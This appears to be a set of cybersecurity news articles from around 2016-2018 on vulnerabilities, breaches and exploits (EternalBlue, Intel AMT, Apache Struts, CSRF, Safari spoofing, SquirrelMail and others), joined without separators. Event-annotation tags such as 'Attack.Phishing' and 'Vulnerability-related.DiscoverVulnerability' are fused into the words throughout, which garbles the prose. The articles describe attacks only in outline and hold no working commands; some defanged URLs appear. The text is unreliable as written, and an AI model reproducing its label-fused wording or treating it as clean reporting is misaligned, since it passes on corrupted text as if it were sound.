recommendations may change as new information becomes available , and we will update this post when that happens .
EdgeWave , Inc.® , a leading provider in cybersecurity and compliance , today revealedVulnerability-related.DiscoverVulnerabilitya new , malicious exploit embedded in popular URL shorteners , which are being mistaken as legitimate URLs . URL shorteners may be susceptible to this new exploit when a change is allowed to the long URL after the shortened URL is created . The malicious parties fabricateAttack.Phishingan email that appears to beAttack.Phishinga legitimate marketing email which includes the shortened URL -- - passing by any in-transit virus scanning and potentially other spam checking tools . `` Several days ago , we detectedVulnerability-related.DiscoverVulnerabilitythis new exploit while performing our real-time , human analysis on spam campaigns , '' said Blake Tullysmith , Principal Engineer at EdgeWave . `` With over 100 million URLs being shortened per day , this new exploit can potentially impact billions of users across email and social media campaigns . '' Here is how the EdgeWave ePrism team explains the exploit : Some URL shorteners will allow users to change the long URL after they have already created the shortened URL . The malicious parties will then fabricateAttack.Phishinga seemingly legitimate email and include a shortened URL that passes in-transit virus scanning as well as other filtering solutions , which will allow the shortened URL to be delivered right into the inbox . Once the spam campaign is embedded in the message , the URL is redirected to a site that contains malicious content like a virus or malware . However , the delivered message is already in the inbox ; so unfortunately , there is no protection at this point . Attached is an image of a sample email message extracted from an email campaign while in-transit with a link from http : //tiny.cc pointing to a clean website . After the campaign was delivered , it points to a compromised website including malicious content . The EdgeWave team is still conducting further investigations on this exploit and recommends all URL shortening users utilize services that do not allow the URL to be edited after its creation . EdgeWave customers are being protected by its ePrism Email Security solution . EdgeWave ePrism is an award-winning , hosted cloud email security solution with Zero-Minute Defense against phishing , spam and malware campaigns using our unique combination of automated intelligence and 24/7/365 human analysis in a simple-to-use security suite for all email compliance and business needs .
Sensors used to detect the level of ambient light can be used to stealAttack.Databreachbrowser data , according to privacy expert Lukasz Olejnik . Over the past decade , ambient light sensors have become quite common in smartphones , tablets , and laptops , where they are used to detect the level of surrounding light and automatically adjust a screen 's intensity to optimize battery consumption ... and other stuff . The sensors have become so prevalent , that the World Wide Web Consortium ( W3C ) has developed a special API that allows websites ( through a browser ) to interact with a device 's ambient light sensors . Browsers such as Chrome and Firefox have already shipped versions of this API with their products . Last month , in a discussion of the W3C Generic Sensor specification , the Google team proposed that ambient light sensors ( ALS ) , together with gyroscope , magnetometer , and accelerometer sensors , should be exempt from the browser permissions system . In other words , websites using these sensors wo n't have to ask users for explicit permission before accessing the any of these four sensors . Google 's opinion is that by removing this permission requirement , browsers will be on par with mobile applications , which also do n't have to ask the user for permission before accessing these sensors . This proposal did n't go well with Olejnik and fellow researcher Artur Janc , who in a series of demos , have proved that light radiating from the device 's screen , is often picked up by the ambient light sensors . A determined attacker that can lureAttack.Phishingvictims to his site , or one that can insert malicious code on another site , can determine which URLs a user has visited in the past . The whole attack relies on using different colors for normal and previously visited links , which produce a small light variation that ambient light sensors can pick up . Furthermore , Olejnik and Janc also proved that ambient light sensors can stealAttack.DatabreachQR codes , albeit this attack takes longer to perform . Right now , ambient light sensors readings are blocked in Chrome behind settings flags , as the API is experimental , but they 're supported in Firefox via DeviceLight events . According to Olejnik , mitigating this attack is simple , as it only requires browser makers and the W3C to adjust the default frequency at which the sensors report their readings . Furthermore , the researcher also recommends that browser makers quantize the result by limiting the precision of the sensor output to only a few values in a preset range . Both attacks Olejnik and Janc devised take from seconds to minutes to execute . With these mitigations in place , the attacks would n't be stopped , but they would take even longer to perform , making any of them impractical in the real world . In the long run , Olejnik and Janc hope to see access to these sensors behind a dedicated browser permission . The two researchers filedVulnerability-related.DiscoverVulnerabilitybug reports with both Chrome and Firefox in the hopes their recommendations will be followed . Olejnik has previously showed how battery readouts can allow advertisers to track users online , how the new W3C Web Bluetooth API is riddled with privacy holes , and how the new W3C Proximity Sensor API allows websites and advertisers to query the position of nearby objects .
While combing through WikiLeaks’ Vault 7 data dumpAttack.Databreach, Cisco has unearthedVulnerability-related.DiscoverVulnerabilitya critical vulnerability affecting 300+ of its switches and one gateway that could be exploitedVulnerability-related.DiscoverVulnerabilityto take over the devices . The flaw is presentVulnerability-related.DiscoverVulnerabilityin the Cisco Cluster Management Protocol ( CMP ) processing code in Cisco IOS and Cisco IOS XE Software . “ The vulnerability is due to the combination of two factors : the failure to restrict the use of CMP-specific Telnet options only to internal , local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device , and the incorrect processing of malformed CMP-specific Telnet options , ” Cisco explained . An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device ” . The extensive and complete list of affected devices is provided in the security advisory . Cisco says that they are not aware of any public announcements or active malicious use of the vulnerability , and that they will provideVulnerability-related.PatchVulnerabilityfree software updates to addressVulnerability-related.PatchVulnerabilityit ( they don ’ t say when ) . In the meantime , users can mitigate the risk by disabling the Telnet protocol and switching to using SSH . If that ’ s not possible , they can reduce the attack surface by implementing infrastructure access control lists . It also includes indicators of compromise that can be used to detect exploitation attempts
A flaw in unpatched versions of Window 10 could leave machines vulnerableVulnerability-related.DiscoverVulnerabilityto EternalBlue , the remote kernel exploit behind the recent WannaCry ransomware attackAttack.Ransom. WannaCry targeted a Server Message Block ( SMB ) critical vulnerability that Microsoft patchedVulnerability-related.PatchVulnerabilitywith MS17-010 on March 14 , 2017 . While WannaCry damageAttack.Ransomwas mostly limited to machines running Windows 7 , a different version of EternalBlue could infect Windows 10 . Researchers at RiskSense stripped the original leaked version of EternalBlue down to its essential components and deemed parts of the data unnecessary for exploitation . They found they could bypass detection rules recommended by governments and antivirus vendors , says RiskSense senior security researcher Sean Dillon . This version of EternalBlue , an exploit initially released by Shadow Brokers earlier this year , does not use the DoublePulsar payload common among other exploits leaked by the hacker group . DoublePulsar was the main implant used in WannaCryAttack.Ransomand a key focus for defenders . `` That backdoor is unnecessary , '' says Dillon , noting how it 's dangerous for businesses to only focus on DoublePulsar malware . `` This exploit could directly load malware onto the system without needing to install the backdoor . '' EternalBlue gives instant un-credentialed remote access to Windows machines without the MS17-010 patch update . While it 's difficult to port EternalBlue to additional versions of Windows , it 's not impossible . Unpatched Windows 10 machines are at risk , despite the fact that Microsoft 's newest OS receives exploit mitigations that earlier versions do n't . The slimmed-down EternalBlue can be ported to unpatched versions of Windows 10 and deliver stealthier payloads . An advanced malware would be able to target any Windows machine , broadening the spread of an attack like WannaCry , Dillon explains . It 's worth noting WannaCry was a blatant , obvious attack , he says , and other types of malware , like banking spyware and bitcoin miners , could more easily fly under the radar . `` These can infect a network and you wo n't know about it until years later , '' he says . `` It 's a threat to organizations that have been targets , like governments and corporations . Attackers may try to get onto these networks and lay dormant … then stealAttack.Databreachintellectual property or cause other damage . '' Dillon emphasizes the importance of updatingVulnerability-related.PatchVulnerabilityto the latest version of Windows 10 , but says patchingVulnerability-related.PatchVulnerabilityalone wo n't give complete protection from this kind of threat . Businesses with SMB facing the Internet should also put up firewalls , and set up VPN access for users who need external access to the internal network . Businesses should have a good inventory of software and devices on their networks , along with processes for identifying and deployingVulnerability-related.PatchVulnerabilitypatches as they are releasedVulnerability-related.PatchVulnerability, says Craig Young , computer security researcher for Tripwire 's Vulnerability and Exposures Research Team ( VERT ) . This will become even more critical as attackers move quickly from patch to exploit . There will always be a window of opportunity for attackers before the right patches are installedVulnerability-related.PatchVulnerability, Young notes . EternalBlue is a `` very fresh vulnerability '' given that most breaches that use exploits leverage flaws that have been publicly knownVulnerability-related.DiscoverVulnerabilityfor an average of two years or more . `` EternalBlue is a particularly reliable exploit that gives access to execute code at the very highest privilege level , so I would expect that hackers and penetration testers will get a lot of use out of it for years to come , '' he says .
A decade ago , cross-site request forgery ( CSRF , often pronounced “ c-surf ” ) was considered to be a sleeping giant , preparing to wake and inflict havoc on the Worldwide Web . But the doomsday scenario never materialized and you don ’ t even seem to hear much about it anymore . In this blog post , part 1 of 2 , I will explore this idea and try to understand why the CSRF giant never awoke . First we ’ ll cover the overall threat landscape , trends , and some notable CSRF exploits throughout the years , including one from personal experience . As a quick review , CSRF exists because web applications trust the cookies sent by web browsers within an HTTP request . In a CSRF attack , the attacker causes a victim ’ s browser to make a request that results in a change or action which benefits the attacker ( and/or harms the victim ) in some way . Without a specific defense – like a random token in the request body that is validated on the server side – CSRF attacks are possible . After a bit of testing , my suspicions were confirmed . All requests that caused any sort of change could be exploited with CSRF . This included : I contacted the company to let them knowVulnerability-related.DiscoverVulnerabilityabout these security holes . Surprisingly , they didn ’ t seem to be aware there was such a thing as CSRF , but they thanked me anyway and rolled outVulnerability-related.PatchVulnerabilitya fix about a month later . There have been other notable instances of CSRF vulnerabilities with some of them being exploitedVulnerability-related.DiscoverVulnerabilityin the wild . Drive-by pharming is an attack on the DNS settings of home routers and modems and often leverages CSRF as a key element . The web UIs on these devices are the culprit , because they allow users to edit configuration settings . In one attack from 2008 , banking customers in Mexico who owned 2Wire DSL modems were targeted . Victims received an email with an embedded image tag with a CSRF attack that changed the DNS settings on their modem . In another instance , tens of thousands of Twitter users fell victim to a CSRF worm in 2010 when developers failed to implement anti-CSRF measures for tweets . The vulnerability was discoveredVulnerability-related.DiscoverVulnerabilityand exploitedVulnerability-related.DiscoverVulnerabilityin a rather distasteful but harmless way . When authenticated Twitter users visited the web page containing the exploit , they unknowingly posted two tweets – one with a link to the same page and another with a message about goats . Anyone who clicked on the link in the first tweet also posted the same two tweets . The worm spread like wildfire before it was fixed by Twitter . In 2012 Facebook ’ s App Center was vulnerableVulnerability-related.DiscoverVulnerabilityto CSRF and the security researcher who discoveredVulnerability-related.DiscoverVulnerabilitythe flaw was awarded $ 5000 as a bounty . Interestingly , in this case the HTTP request included an anti-CSRF token that appeared at first glance to provide protection , but the token was not being validated by the server-side application when the request was received . A Qualys researcher found other examples where anti-CSRF tokens were not properly validated . And similar to the Facebook issue mentioned above , PayPal in 2016 did not validate the anti-CSRF token in paypal.me . An attacker could only change a user ’ s profile photo in that case however .
In an email sent to users on 26th December , the site explainedVulnerability-related.DiscoverVulnerabilitythat hackers were able to conduct this breach by exploitingVulnerability-related.DiscoverVulnerabilitya known vulnerability in outdated vBulletin forum software . Although PakWheels didn ’ t reveal the number of affected users , we at HackRead have inside details on this breachAttack.Databreachaccording to which the number of targeted users impacted by this breachAttack.Databreachgoes over 674,775 users including names , emails , encrypted passwords , mobile number and Facebook sessions . PakWheels was started back in 2003 to fill the missing space between automotive enthusiasts and absence of a platform that discusses automotive industry related topics in the country . In May 2016 , Pakistan ’ s real estate giant Zameen was hackedAttack.Databreachby a Bangladeshi hacker who leakedAttack.Databreachits entire database after being ignored by Zameen ’ s administration . As far as vBulletin forum software , the year 2016 , has been a bad year for anyone using vBulletin and not updating it to its latest version . Until now , the forums hackedAttack.Databreachdue to vulnerability in outdated vBulletin forum software include Clash of Kings forum with 1.6 million data stolen , Epic games forum with 800,000 accounts stolen , Grand Theft Auto ( GTA ) forum , Russia ’ s Mail.ru with 27 million accounts stolen , LifeBoat forum with 7 million accounts stolen and Exile Mod gaming forum with 12,000 accounts stolen .
A security vulnerability in Intel Corp. chips first disclosedVulnerability-related.DiscoverVulnerabilitylast week looks far worse than initially thought , as hackers can hijack Intel processors without even needing a password . The vulnerability , which affectsVulnerability-related.DiscoverVulnerabilityall Intel chips manufactured since 2008 , from those code-named Nahalem to today ’ s Kaby Lake , stems from a flaw in vPro firmware suite including Intel Active Management Technology from versions 6 to 11.6 . The security hole allows an unprivileged attacker to gain control of the manageability features provided by the firmware suite , giving a would-be hacker the same access that a systems administrator would have , including the ability to change boot up code and access the computer ’ s mouse , keyboard , monitor and programs installed . Intel argued that access to the vulnerability was fairly limited , in that a password was required to access AMT . But Tenable Network Security Inc . has discoveredVulnerability-related.DiscoverVulnerabilitythat the verification process for AMT accepts a blank password submission . As Rick Falkvinge at Private Internet Access explains : In order to get administrator privileges to the server memory , all you needed to do was to submit a blank password field instead of the expected privileged-access password hash , and you would have unlimited and unlogged read/write access to the entire server memory . With the ability to gain access to an Intel central processing unit as simple as submitting no password , experts are warning that the worst should be presumed . “ If you have anything connected to the Internet with AMT on , disable it now . Assume the server has already been compromised , ” SSH inventor Tatu Ylonen said in a blog post . “ The exploit is trivial , a maximum of five lines of Python , and could be doable in a one-line shell command. ” He said the flaw gives full control of affected machines , including the ability to read and modify everything . “ It can be used to install persistent malware – possibly in the firmware – and read and modify any data . Ylonen recommended that AMT be disabled today and that affected users “ mobilize whomever you need. ” More specifically , he said , “ start from the most critical servers : Active Directory , certificate authorities , critical databases , code signing servers , firewalls , security servers , HSMs ( if they have it enabled ) . ” Data center operators should “ block ports 16992 , 16993 , 16994 , 16995 , 623 , 664 in internal firewalls ” if they can .
Some medical devices , smartphones and internet of things gadgets contain certain types of sensors that are vulnerableVulnerability-related.DiscoverVulnerabilityto potential hacking using sound waves , saysVulnerability-related.DiscoverVulnerabilitycybersecurity researcher Kevin Fu . `` This is now a risk that all manufacturers should be aware of , and in their hazard analysis , it has to be a part of their cybersecurity risk management , '' says Fu , explaining findings of a recent research study conducted by the University of Michigan and the University of South Carolina . The microelectromechanical systems - or MEMS accelerometers - that the research team foundVulnerability-related.DiscoverVulnerabilityto contain these vulnerabilities - are sensors used in various devices to measure acceleration or velocity , and then report those readings to a microprocessor . `` What we looked atVulnerability-related.DiscoverVulnerabilitywas the ability to trick these sensors into delivering false readings to the microprocessor by using sound waves , '' he says in an interview with Information Security Media Group . `` What medical devices contain these sensors is still an open question . The main hazard of this sound wave vulnerability is the threat to the integrity and availability of the sensor , he explainsVulnerability-related.DiscoverVulnerability. Prior studies by other researchers had foundVulnerability-related.DiscoverVulnerabilitythat sound waves can be used to disable these sensors . `` What 's new here is that it is now known that one can actually damage the integrity of the reading , '' he says . `` If you were trusting this reading to do something automated , such as rate-adapt a pacemaker , perhaps based on changing activity of a patient , you now need a second way to verify the integrity of that reading . '' The study lists 20 accelerometers for which the researchers were able to change the output of the sensors using sound waves , Fu says . `` In some devices , we found that there is a speaker built in right next to the sensor , which means there is a remote ability to cause these changes without an adversary being near the chip . '' Fu recommends that manufacturers assess the researchers ' list of accelerometers that contain the sound wave vulnerability `` and ask [ suppliers ] for specific parameters , including the resident frequencies , to understand the risks and mitigations .
The big security issue of the week is a remote code execution hole related to the Cisco WebEx service . WebEx is a popular collaboration tool for online events such as meetings , webinars and videoconferences . Like many services of this sort , you access online events via your browser , augmented by a special-purpose browser extension . Browser extensions and plugins allow web developers to extend the software features inside your browser with a mixture of scripts and program code , for example to add configuration options or to support new audio and video formats . Of course , when you add another layer of programmatic complexity on top of an already-complex browser , it ’ s easy to add new security holes , too . Perhaps the best known example of a problematic plugin is Adobe Flash , which has provided cybercrooks with such a fruitful source of exploitable security holes over the years that we have long been urging you to try to live without Flash altogether . The latest security scareVulnerability-related.DiscoverVulnerabilityof this sort has been dubbed CVE-2017-3823 , and it applies to Cisco ’ s special-purpose WebEx browser extension . In oher words , if your organisation uses WebEx , you probably have the browser extension installed , and if you have it installed , you may be at risk . According to Tavis Ormandy at Google ’ s Project Zero , who discoveredVulnerability-related.DiscoverVulnerabilityand documentedVulnerability-related.DiscoverVulnerabilitythe bug , there are more than 20 million WebEx users worldwide . According to Cisco , Internet Explorer , Chrome and Firefox on Windows are affected . Microsoft Edge on Windows and all browsers on Mac and Linux are safe . The most recent update for Chrome is Cisco WebEx extension 1.0.7 . Cisco published a notification about this update at 2017-01-26T19:45Z , having issued and then withdrawn 1.0.3 and then 1.0.5 earlier this week after deeming them “ incomplete ” . However , at 2017-01-26T19:45Z , Cisco ’ s official Security Advisory page says : Cisco is currently developingVulnerability-related.PatchVulnerabilityupdates that addressVulnerability-related.PatchVulnerabilitythis vulnerability for Firefox and Internet Explorer . There are no workarounds that address this vulnerability . Using Microsoft Edge on Windows or any browser on Mac or Linux will shield you from this bug because it doesn ’ t apply on those platforms . You can also turn off WebEx support in your browser temporarily , thus preventing the Cisco extension or add-on from activating unexpectedly .
DiscoveredVulnerability-related.DiscoverVulnerabilityby a security researcher who goes by the name of Zenofex , these security flaws have not been reportedVulnerability-related.DiscoverVulnerabilityto Western Digital , are still unpatchedVulnerability-related.PatchVulnerability, and with public exploit code is available for more than half of the vulnerabilities . According to Zenofex multiple WD MyCloud NAS device models are affectedVulnerability-related.DiscoverVulnerability, such as : Zenofex 's decision not to informVulnerability-related.DiscoverVulnerabilityWestern Digital came after the researcher attended a security conference last year , where other infosec professionals complained about Western Digital ignoring vulnerability reportsVulnerability-related.DiscoverVulnerability. It was at the same conference , Black Hat USA 2016 , where Western Digital also won a Pwnie Award in a category called `` Lamest Vendor Response . '' `` Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosureVulnerability-related.DiscoverVulnerabilityis worked out , '' Zenofex argued his decision not to wait until Western Digital patchesVulnerability-related.DiscoverVulnerabilitythe security bugs . `` Instead we ’ re attempting to alertVulnerability-related.DiscoverVulnerabilitythe community of the flaws and hoping that users remove their devices from any public facing portions of their networks , limiting access wherever possible , '' he added . Zenofex , who 's a member of the Exploitee.rs community , says he foundVulnerability-related.DiscoverVulnerabilitya whopping total of 85 security issues . Based on the exploit code , many of these security flaws can be exploitedVulnerability-related.DiscoverVulnerabilityby altering cookie values or embedding shell commands in cookie parameters . When the image loads inside their browser , the exploit code executes against the local NAS drive and takes over the device . The most severe of these issues , according to Zenofex , is authentication bypass issue , which ironically was also the easiest to exploit , requiring only the modification of cookie session parameters . And since Murphy 's Law applies to hardware devices as well , things went wrong all the way , and the commands are n't executed under a limited user , but run under root , giving attackers full control over affected devices , allowing them to upload or download data at will .
A flaw in Safari – that allows an attacker to spoofAttack.Phishingwebsites and trickAttack.Phishingvictims into handing over their credentials – has yet to be patchedVulnerability-related.PatchVulnerability. A browser address bar spoofing flaw was foundVulnerability-related.DiscoverVulnerabilityby researchers this week in Safari – and Apple has yet issueVulnerability-related.PatchVulnerabilitya patch for the flaw . Researcher Rafay Baloch on Monday disclosedVulnerability-related.DiscoverVulnerabilitytwo proof-of-concepts revealingVulnerability-related.DiscoverVulnerabilityhow vulnerabilities in Edge browser 42.17134.1.0 and Safari iOS 11.3.1 could be abused to manipulate the browsers ’ address bars , tricking victims into thinking they are visiting a legitimate website . Baloch told Threatpost Wednesday that Apple has promised to fixVulnerability-related.PatchVulnerabilitythe flaw in its next security update for Safari . “ Apple has told [ me ] that the latest beta of iOS 12 also addressesVulnerability-related.PatchVulnerabilitythe issue , however they haven ’ t provided any dates , ” he said . Apple did not respond to multiple requests for comment from Threatpost . Microsoft for its part has fixedVulnerability-related.PatchVulnerabilitythe vulnerability Baloch foundVulnerability-related.DiscoverVulnerabilityin the Edge browser , ( CVE-2018-8383 ) in its August Patch Tuesday release . According to Microsoft ’ s vulnerability advisory releasedVulnerability-related.PatchVulnerabilityAugust 14 , the spoofing flaw exists because Edge does not properly parse HTTP content . Both flaws stem from the Edge and Safari browsers allowing JavaScript to update the address bar while the page is still loading . This means that an attacker could request data from a non-existent port and , due to the delay induced by the setInterval function , trigger the address bar spoofing . The browser would then preserve the address bar and load the content from the spoofed page , Baloch said in his blog breaking down both vulnerabilities . From there , the attacker could spoofAttack.Phishingthe website , using it to lureAttack.Phishingin victims and potentially gather credentials or spread malware . For instance , the attacker could sendAttack.Phishingan email message containing the specially crafted URL to the user , convince the user to click it , and take them to the link which could gather their credentials or sensitive information . “ As per Google , Address bar is the only reliable indicator for ensuring the identity of the website , if the Address bar points to Facebook.com and the content is hosted on attacker ’ s website , there is no reason why someone would not fall for this , ” Baloch told Threatpost . In a video demonstration , Baloch showed how he could visit a link for the vulnerable browser on Edge ( http : //sh3ifu [ . ] com/bt/Edge-Spoof.html ) , which would take him to a site purporting to beAttack.PhishingGmail login . However , while the URL points to a Gmail address , the content is hosted on sh3ifu.com , said Baloch . The Safari proof-of-concept is similar , except for one constraint where it does not allow users to type their information into the input boxes while the page is in a loading state . However , Bolach said he was able to circumvent this restriction by injecting a fake keyboard using Javascript – a common practice in banking sites . No other browsers – including Chrome or Firefox – were discoveredVulnerability-related.DiscoverVulnerabilityto have the flaw , said Baloch . Baloch is known for discoveringVulnerability-related.DiscoverVulnerabilitysimilar vulnerabilities in Chrome , Firefox and other major browsers in 2016 , which also allowed attackers to spoof URLs in the address bar . The vulnerabilities were disclosedVulnerability-related.DiscoverVulnerabilityto both Microsoft and Apple and Baloch gave both a 90-day deadline before he went publicVulnerability-related.DiscoverVulnerabilitywith the flaws . Due to the Safari browser bug being unpatchedVulnerability-related.PatchVulnerability, Baloch said he has not yet released a Proof of Concept : “ However considering there is a slight difference between the Edge browser POC and Safari , anyone with decent knowledge of Javascript can make it work on Safari , ” he told us .
Further ReadingStepson of Stuxnet stalked Kaspersky for months , tapped Iran nuke talksTwo years ago , researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen . Virtually all of the malware resided solely in the memory of the compromised computers , a feat that had allowed the infection to remain undetected for six months or more . Kaspersky eventually unearthed evidence that Duqu 2.0 , as the never-before-seen malware was dubbed , was derived from Stuxnet , the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran ’ s nuclear program . The Kaspersky Lab researchers still do n't know if a single group of individuals is behind the attacks , or if they 're being carried out by competing hacker gangs . The use of the fileless malware and command-server domains that are n't associated with any whois data makes the already difficult task of attribution almost impossible . The researchers first discovered the malware late last year , when a bank 's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller . After conducting a forensic analysis , the researchers foundVulnerability-related.DiscoverVulnerabilitythat the Meterpreter code was downloaded and injected into memory using PowerShell commands . The infected machine also used Microsoft 's NETSH networking tool to transport data to attacker-controlled servers . To obtain the administrative privileges necessary to do these things , the attackers also relied on Mimikatz . To reduce the evidence left in logs or hard drives , the attackers stashed the PowerShell commands into the Windows registry . Fortunately , the evidence on the domain controller was intact , presumably because it had n't been restarted before Kaspersky Lab researchers began their investigation . An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code . The attackers , the researchers later determined , had used the tools to collectAttack.Databreachpasswords of system administrators and for the remote administration of infected host machines .
Trade-off between security and usability unlikely to permit systematic surveillance , experts say • This article was originally published on 13 January 2017 . It has been extensively amended ( see endnotes ) following a review by the Guardian ’ s readers ’ editor . A design feature that could potentially allow some encrypted messages to reach unintended recipients is presentVulnerability-related.DiscoverVulnerabilitywithin the WhatsApp messaging service . Facebook-owned WhatsApp , which has about one billion users , has not made it widely known that there is an aspect of WhatsApp that results in some messages being re-encrypted and resent automatically , without first giving the sender an opportunity to verify the recipient . Campaigners have expressed concernVulnerability-related.DiscoverVulnerabilityabout how this aspect of WhatsApp could potentially be exploitedVulnerability-related.DiscoverVulnerabilityto conduct surveillance . WhatsApp has made privacy and security a primary selling point , and has become a go-to communications tool of activists , dissidents and diplomats . Its end-to-end encryption relies on the generation of unique security keys using the acclaimed Signal protocol , developed by Open Whisper Systems . Keys are exchanged between users to guarantee communications are secure from interception by middlemen . The way WhatsApp implemented the protocol , new keys are generated when – for example – a user gets a new phone or reinstalls the app . Messages for the user which may have been waiting to be delivered while the user was offline are then re-encrypted and resent by the sender automatically , without the sender having had an opportunity to verify that the recipient is the person intended to receive the message . A sender is notified after the event if the sender has opted to turn on a notification in settings , but not otherwise . This aspect of WhatsApp , which increases convenience and reliability of message delivery at the cost of some security , is not inherent to the Signal protocol . If a recipient ’ s security key changes while offline , an in-transit message will fail to be delivered and the sender will be notified of the change in security keys without the message having been resent automatically .
Cisco 's Talos says they 've observedVulnerability-related.DiscoverVulnerabilityactive attacks against a Zero-Day vulnerability in Apache 's Struts , a popular Java application framework . Cisco started investigatingVulnerability-related.DiscoverVulnerabilitythe vulnerability shortly after it was disclosedVulnerability-related.DiscoverVulnerability, and foundVulnerability-related.DiscoverVulnerabilitya number of active attacks . In an advisory issued on Monday , Apache saysVulnerability-related.DiscoverVulnerabilitythe problem with Struts exists within the Jakarta Multipart parser . `` It is possible to perform a RCE attack with a malicious Content-Type value . If the Content-Type value is n't valid an exception is thrown which is then used to display an error message to a user , '' the warning explained . `` If you are using Jakarta based file upload Multipart parser , upgradeVulnerability-related.PatchVulnerabilityto Apache Struts version 2.3.32 or 2.5.10.1 . You can also switch to a different implementation of the Multipart parser . '' The alternative is the Pell parser plugin , which uses Jason Pell 's multipart parser instead of the Common-FileUpload library , Apache explains . In addition , administrators concerned about the issue could just apply the proper updates , which are currently availableVulnerability-related.PatchVulnerability. In a blog post , Cisco said they discovered a number of attacks that seem to be leveraging a publicly released proof-of-concept to run various commands . Such commands include simple ones ( 'whoami ' ) as well as more sophisticated ones , including pulling down malicious ELF executable and running it . An example of one attack , which attempts to copy the file to a harmless directory , ensure the executable runs , and that the firewall is disabled is boot-up , is below : Both Cisco and Apache urge administrators to take action , either by patchingVulnerability-related.PatchVulnerabilityor ensuring their systems are not vulnerable . This is n't the first time the Struts platform has come under attack . In 2013 , Chinese hackers were using an automated tool to exploit known vulnerabilities in order to install a backdoor .
A breach of the Clash of Clans creator has exposed credentials for forum users . Supercell , the force behind that popular mobile game and others , saidVulnerability-related.DiscoverVulnerabilitythat a vulnerability in the software it uses to run its forums allowed third-party hackers to gain illegal access to some forum user information , including a number of emails and encrypted passwords . To provide its forum service , it uses software from vbulletin.com . The company said that its preliminary investigation suggests that the breach happened in September 2016—and that it has since been fixed . “ We take any such breaches very seriously and we follow very strict policies when it comes to security , ” Supercell said in a statement . “ Please note that this breach only affects our Forum service . Game accounts have not been affected. ” Avast Threat Labs senior malware analyst Jan Sirmer commented via email on the danger of attacks like these . “ The forum administrators in this case do bear some responsibility—the vBulletin software being used to host the Supercell forum was out-of-date , and it ’ s up to the administrators to keep software like that up-to-date , ” he said . “ Online gamers are vulnerable to these kind of hacks because they provide their data to third parties—but the same is true for everyone who uses any online service. ” Users should change the password they ’ re using on the forum as soon as possible , along with the password in any other systems they ’ re using with the same login . “ The information the hackers obtainedAttack.Databreachcan either be used by the hackers themselves or sold on the darknet for other hackers to abuse , ” Sirmir said . “ As many people use the same login credentials to log in to online services , hackers try to use login credentials they get to gain accessAttack.Databreachinto other accounts . ”
A security researcher that only goes by the nickname of Racco42 discoveredVulnerability-related.DiscoverVulnerabilitythe vulnerability on Thursday , January 12 . The issue affectedVulnerability-related.DiscoverVulnerabilityonly one Cerber server , not all , and was most likely due to a misconfiguration . The server was n't a command and control server , but a mere staging server from where the victims ' computers would connect and download the actual ransomware , which would later run and infect their PCs . An error in one of the server files ( hxxp : //truthforeyoue.top/search.php ) displayed page source code , instead of executing it . This information found its way to Avast security researcher Jaromir Horejsi , who together with the Avast team leveraged this error to get control over the server . For a period of three hours , the Avast teams explains , they collectedAttack.Databreachinformation from server logs . The Avast team observed over 700 users download Cerber installers , which ran on their PCs . Extrapolating this number to a whole day , just one typical Cerber ransomware staging server would be able to deliver payloads to around 8,400 users during a spam run peak or malvertising campaigns .
Users of open source webmail software SquirrelMail are open to remote code execution due to a bug ( CVE-2017-7692 ) discoveredVulnerability-related.DiscoverVulnerabilityindependently by two researchers . “ If the target server uses Sendmail and SquirrelMail is configured to use it as a command-line program , it ’ s possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command , ” the explanation provided by MITRE reads . “ For exploitation , the attacker must upload a sendmail.cf file as an email attachment , and inject the sendmail.cf filename with the -C option within the ‘ Options > Personal Informations > Email Address ’ setting. ” The bug was foundVulnerability-related.DiscoverVulnerabilityby researchers Filippo Cavallarin and Dawid Golunski , independently of one another , and affects SquirrelMail versions 1.4.22 and below . Golunski reportedVulnerability-related.DiscoverVulnerabilityit to SquirrelMail ( sole ) developer Paul Lesniewski , who asked for a delay of publication of the details until he could fixVulnerability-related.PatchVulnerabilitythe flaw . But as Cavallarin publishedVulnerability-related.DiscoverVulnerabilitydetails about it last week ( after not receiving any reply by the SquirrelMail developer ) , Golunski did the same during the weekend . Both researchers providedVulnerability-related.DiscoverVulnerabilitya proof-of-concept exploit for the flaw , and Cavallarin even offeredVulnerability-related.PatchVulnerabilityan unofficial patch for pluggingVulnerability-related.PatchVulnerabilitythe hole . All this prompted Lesniewski to push outVulnerability-related.PatchVulnerabilitya patch on Monday , and new , patched version snapshots of the software ( 1.4.23-svn and 1.5.2-svn ) . He also told The Register that exploitation of the bug is difficult to pull off . “ In order to exploit the bug , a malicious user would need to have already gained control over a mail account by other means , SquirrelMail would need to be configured to allow users to change their outgoing email address ( we recommend keeping this disabled ) , the user would need to determine the location of the attachments directory ( by gaining shell access or making guesses ) , the permissions on said directory and files would need to allow access by other processes ( by default this will usually be the case , but prudent admins will exert more stringent access controls ) and of course , SquirrelMail needs to be configured to send via Sendmail and not SMTP ( default is SMTP ) , ” he explained . Still , according to Golunski , the 1.4.23 version snapshot offeredVulnerability-related.PatchVulnerabilityon Monday was still vulnerableVulnerability-related.DiscoverVulnerability. But another one was pushed outVulnerability-related.PatchVulnerabilitytoday , so it ’ s possible that the issue was finally , definitely fixedVulnerability-related.PatchVulnerability. Users can wait to update their installation until things become more clear , and in the meantime , they can protect themselves by configuring their systems not to use Sendmail .